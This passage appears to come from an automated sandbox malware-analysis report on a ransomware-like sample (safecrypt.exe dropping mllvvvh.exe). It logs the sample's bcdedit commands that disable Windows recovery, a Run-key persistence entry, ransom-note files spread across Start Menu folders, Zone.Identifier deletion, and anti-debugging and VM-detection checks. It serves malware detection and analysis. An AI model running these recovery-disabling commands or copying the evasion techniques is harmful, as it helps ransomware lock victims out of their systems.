            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00403FE9 push ebx; retn 0002h1_2_00403FEA
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00428DC5 push ecx; ret 1_1_00428DD8
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00403FE9 push ebx; retn 0002h1_1_00403FEA
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00428DC5 push ecx; ret 4_1_00428DD8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00403FE9 push ebx; retn 0002h4_1_00403FEA
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00428DC5 push ecx; ret 20_2_00428DD8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00403FE9 push ebx; retn 0002h20_2_00403FEA
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00428DC5 push ecx; ret 20_1_00428DD8
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00403FE9 push ebx; retn 0002h20_1_00403FEA
            Source: initial sampleStatic PE information: section name: .text entropy: 7.12605118752
            Source: initial sampleStatic PE information: section name: .text entropy: 7.12605118752

            Persistence and Installation Behavior:

            barindex
            Uses bcdedit to modify the Windows boot settingsShow sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit offJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled offJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeFile created: C:\Users\user\AppData\Roaming\mllvvvh.exeJump to dropped file

            Boot Survival:

            barindex
            Creates autostart registry keys with suspicious namesShow sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.pngJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.txtJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.htmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010Jump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Creates files in the recycle bin to hide itselfShow sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile created: C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.pngJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\Desktop\safecrypt.exeFile opened: C:\Users\user\Desktop\safecrypt.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile opened: C:\Users\user\AppData\Roaming\mllvvvh.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile opened: C:\Users\user\AppData\Roaming\mllvvvh.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile opened: C:\Users\user\AppData\Roaming\mllvvvh.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile opened: C:\Users\user\AppData\Roaming\mllvvvh.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041CBF0
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,FindCloseChangeNotification,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_1_0041CBF0
            Source: C:\Users\user\Desktop\safecrypt.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-17809
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
            Source: C:\Users\user\Desktop\safecrypt.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-16620
            Source: C:\Users\user\Desktop\safecrypt.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-16977
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\Desktop\safecrypt.exe TID: 5056Thread sleep time: -31000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 6012Thread sleep time: -31000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 5784Thread sleep time: -31000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 4936Thread sleep time: -31000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe TID: 1936Thread sleep time: -31000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,1_2_00413AD0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,1_1_00413AD0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,4_1_00413AD0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,20_2_00413AD0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00413860 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,1_2_00413860
            Source: C:\Users\user\Desktop\safecrypt.exeThread delayed: delay time: 31000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeThread delayed: delay time: 31000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeThread delayed: delay time: 31000
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeThread delayed: delay time: 31000
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0zu%SystemRoot%\system32\mswsock.dllD#_
            Source: bcdedit.exe, 0000000E.00000002.344316029.000001F50D348000.00000004.00000020.sdmpBinary or memory string: EFI VMware Virtual SATA CDROM Drive
            Source: bcdedit.exe, 00000010.00000002.349066454.000001EA568C9000.00000004.00000020.sdmpBinary or memory string: pEFI VMware Virtual S<
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: bcdedit.exe, 0000000B.00000002.339580407.00000212930D8000.00000004.00000020.sdmpBinary or memory string: EFI VMware Virtual SATA CDROM Drive "
            Source: bcdedit.exe, 00000006.00000002.334981515.0000024E4BB60000.00000002.00000001.sdmp, bcdedit.exe, 0000000B.00000002.339599752.0000021293230000.00000002.00000001.sdmp, bcdedit.exe, 0000000E.00000002.344484541.000001F50D610000.00000002.00000001.sdmp, bcdedit.exe, 00000010.00000002.349076834.000001EA569C0000.00000002.00000001.sdmp, bcdedit.exe, 00000013.00000002.354320369.000001DE3E280000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: bcdedit.exe, 00000013.00000002.354186900.000001DE3DFD8000.00000004.00000020.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004256D3
